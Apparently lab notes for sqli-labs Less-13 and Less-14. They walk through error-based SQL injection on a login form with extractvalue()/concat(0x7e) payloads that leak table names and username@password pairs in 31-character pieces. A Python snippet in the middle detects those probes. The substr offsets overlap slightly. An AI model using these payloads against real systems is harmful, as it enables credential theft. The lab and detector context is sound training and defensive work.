Less-13 and Less-14 are error-based injection
Used when union select is not usable, or when the page has no echo (output) position
Less-13
Closing characters: ('$uname') or ('$passwd')
Determine the closing characters:
uname=username'&passwd=password&Submit=Submit
#Error; the message reveals 'password') LIMIT 0,1'
uname=username') or 1 #&passwd=password&Submit=Submit
#Correct, closing characters confirmed
Determine the number of columns:
uname=username') order by n #&passwd=password&Submit=Submit
#Column count confirmed as 2
Determine the echo position:
uname=username') union select 1,2 #&passwd=password&Submit=Submit
#No echo position found; switch to error-based injection
Query the current database:
uname=username') and extractvalue(1,concat(0x7e,(select database()))) #&passwd=password&Submit=Submit
Query the tables of the current database:
uname=username') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&passwd=password&Submit=Submit
Query the columns of the current table:
uname=username') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&passwd=password&Submit=Submit
Query the data:
uname=username') and extractvalue(1,concat(0x7e,(select group_concat(username,'@',password) from security.users))) #&passwd=password&Submit=Submit
# extractvalue() and updatexml() return at most 32 characters in the error message, so the data is cut off; fetch it in pieces with substr()
uname=username') and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&passwd=password&Submit=Submit
uname=username') and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),62,31))) #&passwd=password&Submit=Submit
...
# 0x7e takes up one character, so each query yields only 31 characters of data
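As an added defensive example (not part of the original notes), a small Python detector that flags the error-based probes described above in URL-encoded POST bodies: it looks for extractvalue()/updatexml() calls, the concat(0x7e, ...) marker, the substr(..., offset, 31) chunking used to page past the 32-character limit, and the quote/parenthesis break-out used while finding the closing characters. The sample bodies are constructed; the parameter names mirror the ones in the notes.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample POST bodies (not real traffic). The first three mimic the
# probes described in the notes; the last one is a benign login.
SAMPLE_BODIES = [
    "uname=username')+and+extractvalue(1,concat(0x7e,(select+database())))+%23&passwd=password&Submit=Submit",
    "uname=username%22+and+extractvalue(1,concat(0x7e,substr((select+group_concat(username,'@',password)+from+security.users),62,31)))+%23&passwd=password&Submit=Submit",
    "uname=username')+or+1+%23&passwd=password&Submit=Submit",
    "uname=admin&passwd=S3cret!&Submit=Submit",
]

# MySQL XML functions whose XPath errors leak the embedded query result.
ERROR_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
# The 0x7e ('~') prefix that forces the XPath syntax error.
XPATH_MARKER = re.compile(r"concat\s*\(\s*0x7e", re.I)
# substr(<expr>, <offset>, <length>) used to page through the 32-char limit.
CHUNKING = re.compile(r"substr\s*\(.*?,\s*(\d+)\s*,\s*(\d+)\s*\)", re.I | re.S)
# A value that closes a quote (and optional parenthesis) then continues with and/or.
BREAKOUT = re.compile(r"""^[^'"]*['"]\)?\s+(and|or)\b""", re.I)


def classify(body):
    """Return a list of (param, finding) tuples for one URL-encoded POST body."""
    findings = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            v = unquote_plus(v)  # normalise a second layer of encoding, if any
            if ERROR_FUNCS.search(v):
                tag = "error-based"
                if XPATH_MARKER.search(v):
                    tag += "+xpath-marker"
                m = CHUNKING.search(v)
                if m:
                    tag += f"+chunk@{m.group(1)}"  # offset being paged to
                findings.append((param, tag))
            elif BREAKOUT.search(v):
                findings.append((param, "quote-breakout"))
    return findings


def scan(bodies=SAMPLE_BODIES):
    """Classify every body; returns {index: findings} for bodies with findings."""
    return {i: f for i, f in ((i, classify(b)) for i, b in enumerate(bodies)) if f}


if __name__ == "__main__":
    for idx, hits in scan().items():
        print(idx, hits)
```

The chunk offset is worth logging on its own: a sequence of requests from one client with offsets climbing by about 31 is the substr paging described above, and it stands out even when individual requests are not blocked.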
Less-14
Same injection technique as Less-13
Closing characters: "$uname" or "$passwd"
uname=username" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=password&Submit=Submit
#Query the current database
uname=username" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&passwd=password&Submit=Submit
#Query the tables of the current database
uname=username" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&passwd=password&Submit=Submit
#Query the columns of the current table
uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #&passwd=password&Submit=Submit
uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&passwd=password&Submit=Submit
uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),62,31))) #&passwd=password&Submit=Submit
...
#Query the data